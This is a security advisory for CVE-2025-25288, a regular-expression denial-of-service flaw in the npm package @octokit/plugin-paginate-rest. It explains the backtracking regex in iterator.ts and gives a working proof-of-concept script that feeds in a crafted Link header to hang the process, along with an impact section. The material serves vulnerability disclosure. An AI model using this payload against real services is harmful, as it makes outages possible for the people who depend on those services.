CVE-2025-25288
@octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
描述
### Summary For the npm package `@octokit/plugin-paginate-rest`, when calling `octokit.paginate.iterator()`, a specially crafted `octokit` instance—particularly with a malicious `link` parameter in the `headers` section of the `request`—can trigger a ReDoS attack. ### Details The issue occurs at [line 39](https://github.com/octokit/plugin-paginate-rest.js/blob/main/src/iterator.ts) of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows: ```js url = ((normalizedResponse.headers.link || "").match( /<([^>]+)>;\s*rel="next"/, ) || [])[1]; ``` The regular expression `/<([^>]+)>;\s*rel="next"/` may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted `Link` headers. ### PoC [The gist of PoC.js](https://gist.github.com/ShiyuBanzhou/d3f2ad000be8384d2105c87c2ed7ce7d) 1. run npm i @octokit/plugin-paginate-rest 2. run 'node poc.js' result: 3. then the program will stuck forever with high CPU usage ```js import { Octokit } from "@octokit/core"; import { paginateRest } from "@octokit/plugin-paginate-rest"; const MyOctokit = Octokit.plugin(paginateRest); const octokit = new MyOctokit({ auth: "your-github-token", }); // Intercept the request to inject a malicious 'link' header for ReDoS octokit.hook.wrap("request", async (request, options) => { const maliciousLinkHeader = "" + "<".repeat(100000) + ">"; // attack string return { data: [], headers: { link: maliciousLinkHeader, // Inject malicious 'link' header }, }; }); // Trigger the ReDoS attack by paginating through GitHub issues (async () => { try { for await (const normalizedResponse of octokit.paginate.iterator( "GET /repos/{owner}/{repo}/issues", { owner: "DayShift", repo: "ReDos", per_page: 100 } )) { console.log({ normalizedResponse }); } } catch (error) { console.error("Error encountered:", error); } })(); ```  ### Impact #### What kind of vulnerability is it? This is a *Regular Expression Denial of Service (ReDoS) vulnerability*, which occurs due to excessive backtracking in the regex pattern: ```js /<([^>]+)>;\s*rel="next"/ ``` When processing a specially crafted `Link` header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness. #### Who is impacted? * Users of `@octokit/plugin-paginate-rest` who call `octokit.paginate.iterator()` and process untrusted or manipulated `Link` headers. * Applications relying on Octokit's pagination mechanism, particularly those handling large volumes of API requests. * GitHub API consumers who integrate this package into their projects for paginated data retrieval.